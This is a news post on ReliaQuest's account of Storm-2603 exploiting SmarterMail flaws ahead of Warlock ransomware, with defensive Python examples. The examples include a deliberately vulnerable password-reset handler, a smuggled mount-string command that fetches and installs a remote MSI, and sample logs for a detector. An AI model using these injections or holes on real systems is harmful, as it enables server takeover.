NEWS SmarterMail has become a gateway to hell: hackers are preparing a wave of ransomware attacks through mail servers.

pinkman

SmarterMail + Storm-2603 = a recipe for cyber doomsday for corporations.
ReliaQuest has detected a wave of intrusions targeting SmarterMail, the email platform from SmarterTools. The break-in occurs through the vulnerability CVE-2026-23760. Based on technical characteristics, the researchers attribute the activity with moderately high confidence to the Storm-2603 group, which originates in China. The observed chain of actions is the first clear evidence that this vulnerability is being used as an entry point ahead of deploying the Warlock ransomware.

The SmarterMail vulnerability allows authentication to be bypassed and a new administrator password to be set through the password-reset API. Normally the mechanism must verify the existing password before changing it. In builds prior to 9511 that check is not performed: the server accepts whatever value is submitted as valid. As a result, an unauthenticated user can overwrite the credentials of any chosen account, without knowing its current password, and obtain the highest privileges in the administrative interface.
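To make the reported flaw concrete, here is a minimal password-reset handler written for this post. It is not SmarterTools code, and the function names, field names and account layout are assumptions. The vulnerable variant models the behaviour the article describes for builds before 9511: the caller's "current password" value is received but never checked. The fixed variant verifies it against the stored hash before anything changes, and answers "unknown user" and "wrong password" identically so the endpoint does not enumerate accounts.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

# Example code written for this post to model the reported reset flaw.
# It is not SmarterMail's implementation; names and data layout are assumed.

PBKDF2_ROUNDS = 200_000


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest) for a password; a fresh salt is drawn if none is given."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison of the candidate against the stored digest."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


class AccountStore:
    """Tiny in-memory stand-in for the mail server's user database."""

    def __init__(self) -> None:
        self.users: Dict[str, dict] = {}

    def add(self, username: str, password: str, is_admin: bool = False) -> None:
        salt, digest = hash_password(password)
        self.users[username] = {"salt": salt, "digest": digest, "admin": is_admin}

    def login(self, username: str, password: str) -> bool:
        u = self.users.get(username)
        return u is not None and verify_password(password, u["salt"], u["digest"])


def reset_password_vulnerable(store: AccountStore, username: str,
                              current_password: str, new_password: str) -> bool:
    """Models the pre-9511 behaviour as reported: the 'current password'
    field is received but never compared with what is stored."""
    u = store.users.get(username)
    if u is None:
        return False
    # BUG: current_password is treated as valid whatever it contains.
    u["salt"], u["digest"] = hash_password(new_password)
    return True


def reset_password_fixed(store: AccountStore, username: str,
                         current_password: str, new_password: str) -> bool:
    """Require proof of the current password before changing it. Unknown user
    and wrong password give the same answer, so account existence is not leaked."""
    u = store.users.get(username)
    if u is None or not verify_password(current_password, u["salt"], u["digest"]):
        return False
    u["salt"], u["digest"] = hash_password(new_password)
    return True


def takeover_attempt(reset_fn) -> bool:
    """Simulate an unauthenticated attacker who knows only the admin username.
    Returns True if the attacker ends up able to log in as admin."""
    store = AccountStore()
    store.add("admin", "correct-horse-battery-staple", is_admin=True)
    reset_fn(store, "admin", "whatever", "attacker-chosen")
    return store.login("admin", "attacker-chosen")


if __name__ == "__main__":
    print("vulnerable handler, attacker logs in as admin:", takeover_attempt(reset_password_vulnerable))
    print("fixed handler, attacker logs in as admin:", takeover_attempt(reset_password_fixed))
```

Running the script shows the whole bug in two lines of output: the vulnerable handler lets the attacker log in as admin with a password of their choosing, the fixed one does not, and the legitimate admin password still works afterwards.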

Logging into the mail console does not by itself mean executing commands on the operating system. In the analyzed cases the attackers take a second step and use the Volume Mount administrative function. This tool connects network storage and accepts a mount string, and the application does not restrict what that parameter may contain, so arbitrary commands can be supplied in place of a legitimate mount target. They are processed with the privileges of the SmarterMail service, which effectively hands control of the Windows host to the attacker. The technique turns access to the web interface into remote code execution and opens the way for downloading further malicious components.
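The mount-string problem is an ordinary command injection, so the fix is the ordinary one: validate the value against the shape a mount target must have and never hand it to a shell as text. The example below was written for this post; it is not SmarterMail's code. The assumption that the feature shells out to `net use` with a fixed drive letter is mine, as is the UNC-path allowlist.

```python
import re
from typing import List, Optional

# Example code written for this post to model the Volume Mount abuse the
# article describes. It is not SmarterMail's implementation; 'net use' and
# the drive letter are assumptions about how such a feature might be built.

# A plain UNC path: \\server\share with optional sub-directories, nothing else.
UNC_PATH = re.compile(
    r"^\\\\[A-Za-z0-9._-]{1,255}"        # server
    r"\\[A-Za-z0-9._$-]{1,80}"           # share
    r"(?:\\[A-Za-z0-9._ -]{1,80})*$"     # optional sub-directories
)


def mount_cmdline_vulnerable(mount_string: str) -> str:
    """The admin-supplied value is spliced into a command line that is then
    passed to the shell, so any metacharacters in it are interpreted."""
    return f"net use Z: {mount_string} /persistent:no"


def mount_argv_fixed(mount_string: str) -> List[str]:
    """Allowlist the shape of the value and pass it as one argument with no
    shell in between, so it can only ever be a path."""
    if not UNC_PATH.fullmatch(mount_string):
        raise ValueError(f"mount string rejected: {mount_string!r}")
    return ["net", "use", "Z:", mount_string, "/persistent:no"]


def shell_command_count(cmdline: str) -> int:
    """Rough count of how many commands cmd.exe would run for a command line
    (splits on & | && ||; ignores quoting, which is enough to show injection)."""
    return len([part for part in re.split(r"&&|\|\||[&|]", cmdline) if part.strip()])


def demo(mount_string: str) -> dict:
    """Show what each builder does with the same admin-supplied value."""
    vuln = mount_cmdline_vulnerable(mount_string)
    fixed: Optional[List[str]]
    try:
        fixed = mount_argv_fixed(mount_string)
        rejected = False
    except ValueError:
        fixed, rejected = None, True
    return {
        "vulnerable_cmdline": vuln,
        "commands_vulnerable": shell_command_count(vuln),
        "fixed_argv": fixed,
        "rejected_by_fix": rejected,
    }


if __name__ == "__main__":
    benign = r"\\fileserver\backups"
    # Constructed hostile value: a second command smuggled in after '&'.
    hostile = r"\\x\y & cmd /c msiexec /i https://example.invalid/v4.msi /quiet"
    for s in (benign, hostile):
        print(demo(s))
```

With the benign path both builders produce a single `net use` command; with the hostile value the vulnerable builder yields a command line that cmd.exe would run as two commands, while the fixed builder refuses the value outright. Rejecting rather than escaping is deliberate: a mount target has a narrow, well-defined syntax, and anything outside it has no legitimate reason to be there.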

The subsequent actions match techniques ReliaQuest has previously observed in Storm-2603 operations. The payload is delivered with msiexec, the standard Windows installer, which downloads the MSI package v4.msi from the Supabase cloud platform. In the recorded cases the legitimate MailService.exe process launched cmd.exe, which in turn performed the download, so from the outside the activity looks like normal mail-service behaviour. In earlier Warlock incidents similar files were hosted on GitHub; the researchers believe the change of hosting is an attempt to evade earlier blocks and signatures.

The downloaded package installs Velociraptor, a well-known digital forensics and incident response tool used by security teams. In this operation it serves as the command-and-control channel to the victim host. Because the agent is a legitimate tool, it is less likely to trip security tooling, which helps the intruders keep a hidden foothold for longer; allowlisting by publisher or reputation will not catch it, so the installation source and the process that triggered the install are the things to watch. In this case the encryptor was not deployed to the network, but the whole preparatory sequence is identical to the previously described Warlock scenarios. According to ReliaQuest, the intrusion was stopped at an early stage.
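The two preceding paragraphs describe a process chain that is easy to express as a detection: the mail service spawning a shell, and msiexec being asked to install a package straight from a URL, with the severity raised when the mail service is in the ancestry. The example below is written for this post and runs over constructed process-creation events in a simplified pipe-separated form; it is not ReliaQuest's detection logic, and the events are not real Sysmon or SmarterMail output. The SmarterMail install path and the Supabase hostname in the sample are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed events in a simplified "timestamp|pid|ppid|image|command line"
# form, made up for this post to resemble the chain the article describes.
# Not real logs; install path and URL host are assumptions.
SAMPLE_EVENTS = r"""
2026-02-15T10:02:11|4120|812|C:\Program Files (x86)\SmarterTools\SmarterMail\Service\MailService.exe|MailService.exe
2026-02-15T10:02:13|5210|4120|C:\Windows\System32\cmd.exe|cmd.exe /c msiexec /i https://example.supabase.co/storage/v1/object/public/pkg/v4.msi /quiet
2026-02-15T10:02:14|5244|5210|C:\Windows\System32\msiexec.exe|msiexec /i https://example.supabase.co/storage/v1/object/public/pkg/v4.msi /quiet
2026-02-15T10:05:40|6008|812|C:\Windows\System32\cmd.exe|cmd.exe /c net start
2026-02-15T10:07:02|6100|6008|C:\Windows\System32\msiexec.exe|msiexec /i C:\Install\printer-driver.msi /qn
"""

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
MAIL_SERVICE = "mailservice.exe"
# msiexec followed, anywhere later on the line, by an http(s) package source.
REMOTE_MSI = re.compile(r"\bmsiexec(?:\.exe)?\b.*?\b(https?://\S+)", re.IGNORECASE)


@dataclass
class Proc:
    ts: str
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> List[Proc]:
    procs = []
    for line in text.strip().splitlines():
        ts, pid, ppid, image, cmdline = line.split("|", 4)
        procs.append(Proc(ts, int(pid), int(ppid), image, cmdline))
    return procs


def ancestors(p: Proc, by_pid: Dict[int, Proc]) -> List[Proc]:
    """Walk parent links upward; stop at unknown pids or a cycle."""
    chain, seen = [], set()
    while p.ppid in by_pid and p.ppid not in seen:
        seen.add(p.ppid)
        p = by_pid[p.ppid]
        chain.append(p)
    return chain


def detect(text: str) -> List[dict]:
    procs = parse_events(text)
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        lineage = ancestors(p, by_pid)
        from_mail_service = any(a.name == MAIL_SERVICE for a in lineage)
        parent = by_pid.get(p.ppid)
        # Rule 1: the mail service process itself spawning a shell.
        if parent is not None and parent.name == MAIL_SERVICE and p.name in SHELLS:
            findings.append({"rule": "mail_service_spawned_shell", "pid": p.pid,
                             "severity": "high", "detail": p.cmdline})
        # Rule 2: msiexec installing a package directly from a URL; worse when
        # the mail service is anywhere in the ancestry.
        m = REMOTE_MSI.search(p.cmdline)
        if m:
            findings.append({"rule": "msiexec_remote_package", "pid": p.pid,
                             "severity": "critical" if from_mail_service else "medium",
                             "detail": m.group(1)})
    return findings


def flagged_pids(findings: List[dict]) -> set:
    return {f["pid"] for f in findings}


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['severity']:8} pid={f['pid']} {f['rule']}: {f['detail']}")
```

On the sample, the cmd.exe started by MailService.exe and the msiexec it launched are both flagged, while the unrelated local driver install later in the log is not. The same rules port to Sysmon Event ID 1 or Windows Security 4688 data; the point of keeping the parent-chain walk is that the URL in a msiexec command line is a medium-confidence signal on its own but a near-certain one when the mail service is upstream of it.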

At the same time, the analysts noticed attempts to exploit a second vulnerability in the platform, CVE-2026-24423. CISA issued an advisory on this issue on February 5, 2026, citing interest from ransomware operators. The logs showed calls to the ConnectToHub API consistent with this flaw. The sources of those requests did not match Storm-2603 infrastructure; possible explanations include a change in the group's addresses, the work of other actors, or automated scanning.

Both vulnerabilities lead to similar results by different paths. CVE-2026-23760 grants administrative privileges without a login, via the password-change procedure, after which the attacker manually activates standard functions to execute commands. CVE-2026-24423, according to the researchers, offers a shorter route to command execution directly through the API. The analyzed incident recorded password-change events, which clearly indicates successful exploitation of the first path; for the second, only the API calls were observed, with no confirmed penetration.

According to ReliaQuest, internet-facing mail servers are currently being probed extensively by a variety of methods. Fixing one vulnerability does not guarantee protection if the attacker has already got in by another route or is using legitimate administrative tools to maintain a hidden presence. Similar tactics are seen in intrusions through VPN gateways and file-transfer services: first an external service is compromised, then movement across the network begins using standard tools, with little obvious malicious code.

ReliaQuest recommends urgently updating all SmarterMail instances to build 9511 or later, which fixes the password-verification bug, and installing the patches for CVE-2026-24423. A further measure is to move the mail host into a separate network segment so that a compromise does not give direct access to the domain controller and other critical systems. Strict outbound traffic rules also help: such a server should be allowed only the protocols it needs, such as SMTP, IMAP and POP3, with all other external connections blocked, especially to cloud storage services and unknown addresses. That cuts off both the control channel and the payload-delivery channel. Because the observed activity relies on legitimate-looking tools once inside, patching should be paired with a review of administrator password-change events and of any processes spawned by the mail service, since those were the traces this intrusion left.
 